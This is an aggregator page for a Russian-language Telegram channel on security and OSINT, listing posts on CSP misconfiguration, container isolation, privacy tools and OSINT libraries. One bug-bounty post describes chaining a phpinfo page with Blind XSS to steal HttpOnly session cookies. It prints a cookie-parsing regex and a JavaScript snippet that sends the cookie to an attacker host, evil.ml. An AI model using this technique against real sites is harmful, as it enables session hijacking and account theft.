Получи случайную криптовалюту за регистрацию!

Cybred

Логотип телеграм канала @cybred — Cybred C
Логотип телеграм канала @cybred — Cybred
Адрес канала: @cybred
Категории: Технологии
Язык: Русский
Количество подписчиков: 3.61K
Описание канала:

Админ жив. Посты будут.

Рейтинги и Отзывы

1.00

2 отзыва

Оценить канал cybred и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

0

4 звезд

0

3 звезд

0

2 звезд

0

1 звезд

2


Последние сообщения

2022-02-11 21:57:12 Если разработчикам внезапно пришла идея, что было бы неплохо настроить CSP в своем веб-приложении, то, как правило, не имея в этом опыта, многие часто совершают ошибки или допускают их намеренно. Например, добавляя недопустимые "unsafe-inline" и "unsafe-eval", чтобы не ловить лишний раз false positive. В данном случае мы обойдем мисконфиг с директивой img-srс на единственный доверенный внешний источник, применив магию стеганографии.

https://telegra.ph/cybred-02-11
532 views18:57
Открыть/Комментировать
2022-02-08 13:24:27
Project Apario - поисковик по рассекреченным документам с открытым исходным кодом. Создан поклонником Джона Кеннеди и теорий заговора после того, как Национальный архив опубликовал огромное количество материалов об убийстве экс-президента общим объемом более 500 000 страниц.

Изначально агрегировал и индексировал только данные, относящиеся непосредственно к убийству Кеннеди, и связанных с ним случаев, вроде расправы над Мартином Лютером Кингом. Но в настоящее время в OSINT-коллекции можно найти и другие документы на тему актуальных событий.

Кроме полезного источника документации, может послужить хорошим источников материалов для RT или Панорамы. Автор тегирует некоторые документы со своими комментариями, — от выводов про заговор Билла Гейтса и Эпштейна для чипирования, и создания медицинского фашизма, до торговли детьми, которую организует ЦРУ. Pizzagate, FauciGate, RussiaGate - все тут.
889 viewsedited  10:24
Открыть/Комментировать
2022-01-31 20:13:50 Перевод расследования одного из участников проекта Bellingcat о недавних атаках на больницы силами безопасности Судана на фоне протестов против военного переворота, совершенного в октябре 2021 года.

https://telegra.ph/cybred-01-31
641 viewsedited  17:13
Открыть/Комментировать
2022-01-21 13:01:11 awesome-privacy — очередной awesome-репозиторий на Github, наполненный, на этот раз, множеством опенсорсных программ и веб-сервисов на все случаи жизни, — начиная с менеджеров паролей и звонилок, заканчивая децентрализованными альтернативами привычным стриминговым платформам, вроде Twitch или Spotify.

Не ленитесь самостоятельно собирать все что можете — как показывает практика, исходники репозитория не всегда сходятся с исходниками автора, который заботливо оставил готовый билд в Releases.
786 views10:01
Открыть/Комментировать
2022-01-20 13:01:18
OSINT-Библиотека, в которой суммарно собрано более сотни академических исследований, профессиональных книг, статей и документов от разных авторов на любимую многими тему разведки в сети.

Список постоянно пополняется новыми материалами, поэтому желающие могут отслеживать изменения при помощи VisualPing или Versionista.
558 views10:01
Открыть/Комментировать
2022-01-19 13:01:13
Манифест 12-факторного приложения методология по созданию SaaS-приложений, которые отвечали бы современным стандартам безопасности, обладали максимальной переносимостью между средами выполнения, и подходили бы для развертывания на облачных платформах.

Некоторые факторы из манифеста: единая кодовая база, утилизируемость, явное объявление и изоляция зависимостей, безопасная передача секретов и их хранение.
314 views10:01
Открыть/Комментировать
2022-01-18 13:02:08 Нашел три интересных проекта, призванных дополнительно обезопасить контейнеризированные приложения и уменьшить поверхность для атаки.

Kata Containers - проект, позволяющий создавать "облегченные" виртуальные машины для разворачивания внутри них различных контейнеров. Призван сэкономить ресурсы сервера, обеспечив при этом дополнительную изоляцию за счет использования гипервизора.

Вроде как, несмотря, на описанные выше плюсы, некоторые ругают его за долгий запуск самих виртуалок. Сам не тестил, но зато нашел решение от AWS в виде Firecracker, который активно использует сам Amazon для сервисов Lambda и Fargate.

На сайте пишут, что время загрузки создаваемых виртуальных машин составляет порядка 125 миллисекунд. Такая скорость достигается благодаря тому, что разработчики вырезали из ядра всю функциональность, которая не требуется в контейнере.

Но если для кого-то и 125мс. покажется долго, на этот случай есть разработанные IBM Nabla контейнеры. Nabla контейнеры используют Unikernels образы и ограничены 7-ю сисколами - read, write, exit_group, clock_gettime, ppoll, pwrite64, и pread64. Все остальные вызовы обрабатываются в библиотечном компоненте Unikernels.
807 views10:02
Открыть/Комментировать
2022-01-17 13:58:03 Обновлено до версии 8.4.3 от 12 января

SHA256: bc742702c5be712e604ebf7b475d6a53c3ae4f3f95fc278de22b201825abc33d
732 views10:58
Открыть/Комментировать
2022-01-16 20:10:32 ⁤Найдя phpinfo на сайте, как показывают многие кейсы на H1, багхантеры сразу же бегут сообщать о своей находке компании, чтобы получить, как правило, минимальную выплату (особенно, когда не утекли никакие особо критичные секреты).

Многие вообще незаслуженно остаются без денег из-за "Out of Scope". Поэтому есть более интересный способ воспользоваться найденной страницей, объединив несколько багов в цепочку и увеличив тем самым критичность.

В данном случае интересует объединение phpinfo с Blind XSS. Так как сейчас тяжело встретить нужную нам куку PHPSESSID (или любую ей аналогичную) без флага HttpOnly, напрямую выкрасть ее сразу не удастся, придется обойти ограничение.

Тут нам и пригодится ранее найденный phpinfo. Не стоит забывать, что помимо информации об ОС и некоторых других, в данном случае, нам неинтересных данных, эта страница также отображает куки зашедшего на нее пользователя.

Поэтому в пэйлоаде, эксплуатирующем Blind XSS, можно сделать от имени пользователя отдельный fetch на phpinfo и спарсить его куки, которые там отобразятся, при помощи следующего регекспа /HTTP_COOKIE.+?<\/td>([\w\W]+?)<\/td>/.

Далее необходимо будет доставить их на наш сервер, обойдя CORS. Это также делается достаточно просто, на примере тега script:
let scr = document.createElement('script');
scr.src = https://evil.ml/?${cookie_var};
document.head.appendChild(scr);

Мы добавляем его на страницу динамически и отправляем извлеченные ранее куки с phpinfo на собственный сервер, обходя политику. Все, что останется сделать - дождаться отстука и пойти проверить access логи.
577 viewsedited  17:10
Открыть/Комментировать
2022-01-14 23:33:06
Что связывает Полянина и Якубца?
948 views20:33
Открыть/Комментировать